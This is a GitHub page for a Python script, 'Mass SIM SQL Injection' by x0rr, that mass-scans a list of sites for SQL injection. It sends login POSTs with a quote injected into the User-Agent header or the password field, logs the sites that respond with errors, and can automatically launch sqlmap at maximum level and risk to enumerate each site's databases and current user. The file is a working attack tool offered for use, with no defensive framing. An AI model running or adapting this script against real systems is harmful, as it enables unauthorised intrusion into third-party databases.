-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathmain.py
177 lines (156 loc) · 8.53 KB
/
main.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
import os, platform, time, requests, sys, re, importlib, wget
from zipfile import ZipFile
from urllib.parse import urlparse
os_plat = platform.system()
class c:
res = "\33[0m"
b = "\33[1m"
r = "\33[31m"
g = "\33[32m"
y = "\33[33m"
def check_req(module_name, package_name):
try:
importlib.import_module(module_name)
except ImportError:
if os_plat == 'Windows':
print("[!] Module " + module_name + " is missing")
os.system("py -m pip install "+ package_name)
else:
print("[!] Module " + module_name + " is missing")
os.system("pip3 install "+ package_name)
check_req("wget", "wget")
check_req("requests", "requests")
try:
os.mkdir('output')
except:
pass
def depen():
if os_plat == 'Linux':
with open('/etc/os-release') as cekos:
l = cekos.read().splitlines()
if l[6] == 'ID_LIKE=debian':
xt = os.path.exists('/usr/bin/xterm')
if xt == True:
pass
elif xt == False:
if user == 0:
pass
else:
print(c.b + c.r + '[!] Something missing, run me with sudo to install missing requirements' + c.res)
sys.exit(1)
print(c.g + c.b +"[*] Installing xterm ..." + c.res)
os.system('apt install xterm -y')
BanSim()
sqlmap = os.path.exists('/usr/share/sqlmap')
if sqlmap == True:
pass
elif sqlmap == False:
user = os.getuid()
if user == 0:
pass
else:
print(c.b + c.r + '[!] Something missing, run me with sudo to install missing requirements' + c.res)
sys.exit(1)
print(c.g + c.b + "[*] Installing sqlmap ..." + c.res)
os.system('apt install sqlmap -y')
BanSim()
elif os_plat == 'Windows':
sqlwin = os.path.exists('.sqlmap')
os.system('title Mass SIM SQL Injection - Coded by x0rr')
if sqlwin == True:
pass
elif sqlwin == False:
pwd = os.getcwd()
print(c.r + c.b + "[!] Something missing, Try to download it ..." + c.res)
print(c.g + c.b + "[*] Downloading ...")
u = "https://github.com/sqlmapproject/sqlmap/archive/refs/tags/1.9.zip"
down = wget.download(u, "requ.zip")
print('\n' + c.res)
BanSim()
with ZipFile(pwd + "\\requ.zip", 'r') as eks:
eks.extractall(path=pwd + "\\")
os.rename('sqlmap-master', '.sqlmap')
os.remove('requ.zip')
else:
print(c.b + c.r + "[!] Something wrong" + c.res)
else:
print('something wrong !')
def clear():
if sys.platform.startswith("linux"):
os.system('clear')
elif sys.platform.startswith("freebsd"):
os.system('clear')
else:
os.system('cls')
def BanSim():
clear()
print(c.b + """
______
.-" "-.
/ \
|, .-. .-. ,|
| )(_"""+ c.b + c.r +"""o""" + c.res + c.b +"""/ \"""" + c.b + c.r +"""o""" + c.res + c.b +"""_)( |
|/ /\ \|
(@_ (_ ^^ _)
_ ) \_______\__|IIIIII|__/_________________________
(_)@8@8{}<________|-\IIIIII/-|__________________________>
)_/ \ /
(@ `--------`
Coded by x0rr
SIM SQL INJECTION""" + c.res)
post_data = {"usr": "a", "pwd": "a", "FBD": "Masuk"} # post data yang akan dikirim ke server
param = {"user-agent": "Mozilla/5.0 (X11; Othros Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'"} # user-agent yang terinjeksi ' untuk mentrigger error 500}
post_data2 = {"usr": "a", "pwd": "a'", "FBD": "Masuk"} # post data yang terinjeksi ' untuk mentrigger error
param2 = {"user-agent": "Mozilla/5.0 (X11; Othros Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"} # user-agent yang tidak terinjeksi
BanSim()
depen()
Target = open(input("[*] List:~# "), 'r')
attack = input('[*] want to attack vulnerable target [Y/N]: ')
def Exploit(Target):
for url_list in Target:
url_list = url_list.strip()
url_parse = urlparse(url_list)
try:
p = requests.post(url_list, data=post_data, headers=param)
p2 = requests.post(url_list, data=post_data2, headers=param2)
os_plat = platform.system()
pattern = "<b>Fatal error</b>"
content = str(p2.content)
if p.status_code == 500:
print(c.b + c.g + "[+] "+ url_list +" | Vuln SQL Injection in user-agent" + c.res)
with open("output/vuln.txt", 'a') as w:
w.write(url_list + '\n')
with open("output/post_" + url_parse[1] +".txt", 'a') as we:
we.write("""POST / HTTP/1.1\nHost: """+ url_parse[1] +"""\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 21\nOrigin: http://"""+ url_parse[1] +"""\nDNT: 1\nConnection: close\nReferer: http://"""+ url_parse[1] +"""/\nCookie: PHPSESSID=huvmumq33uu22oo2ml07indcdgtn3180qtv07kqhicabo0j9dqh0\nUpgrade-Insecure-Requests: 1\n\nusr=a&pwd=a&FBD=Masuk""")
if attack.lower().startswith("y"):
print(c.b + c.g +'[+] Attacking '+ url_parse[1] +' ...'+ c.res)
if os_plat == 'Windows':
os.system('start cmd /k "title Attacking '+ url_parse[1] + ' && py .sqlmap/sqlmap.py -r output/post_' + url_parse[1] + '.txt --threads=1 --level=5 --risk=3 --current-user --current-db --batch --dbs"')
elif os_plat == 'Linux':
os.system("xterm -xrm 'XTerm.vt100.allowTitleOps: false' -T 'Attacking "+ url_parse[1] +"' -e 'sqlmap -r output/post_"+ url_parse[1] +".txt --threads=10 --level=5 --risk=3 --time-sec=3 --batch --current-user --current-db --dbs && sleep 10'")
else:
pass
elif (re.search(pattern, content)):
print(c.b + c.g + "[+] " + url_list +" | Vuln SQL Injection in pwd paramater" + c.res)
with open('output/vuln.txt', 'a') as w:
w.write(url_list + "\n")
with open("output/post_" + url_parse[1] +".txt", 'a') as we:
we.write("""POST / HTTP/1.1\nHost: """+ url_parse[1] +"""\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 21\nOrigin: http://"""+ url_parse[1] +"""\nDNT: 1\nConnection: close\nReferer: http://"""+ url_parse[1] +"""/\nCookie: PHPSESSID=huvmumq33uu22oo2ml07indcdgtn3180qtv07kqhicabo0j9dqh0\nUpgrade-Insecure-Requests: 1\n\nusr=a&pwd=a*&FBD=Masuk""")
if attack.lower().startswith("y"):
print(c.b + c.g +'[+] Attacking '+ url_parse[1] +' ...'+ c.res)
if os_plat == 'Windows':
os.system('start cmd /k "title Attacking '+ url_parse[1] + ' && python .sqlmap/sqlmap.py -r output/post_' + url_parse[1] + '.txt --threads=1 --level=5 --risk=3 --current-user --current-db --batch --dbs"')
elif os_plat == 'Linux':
os.system("xterm -xrm 'XTerm.vt100.allowTitleOps: false' -T 'Attacking "+ url_parse[1] +"' -e 'sqlmap -r output/post_"+ url_parse[1] +".txt --threads=10 --level=5 --risk=3 --time-sec=3 --batch --current-user --current-db --dbs && sleep 10'")
else:
pass
else:
print(c.b + c.r + "[-] "+ url_list +" | Not Vuln" + c.res)
except KeyboardInterrupt:
print(c.b + c.r + "[!] exit" + c.res)
sys.exit(1)
print(c.y + "\n[*] output will save in" + c.b +" output/vuln.txt" + c.res)
print(c.y + "[*] output requests will save in" + c.b +" output/post_site.com.txt\n" + c.res)
Exploit(Target)
count_sim = len(open("output/vuln.txt").readlines())
print(c.b + c.g + "\n[!] "+ str(count_sim )+ " Site vuln with SQL Injection"+ c.res)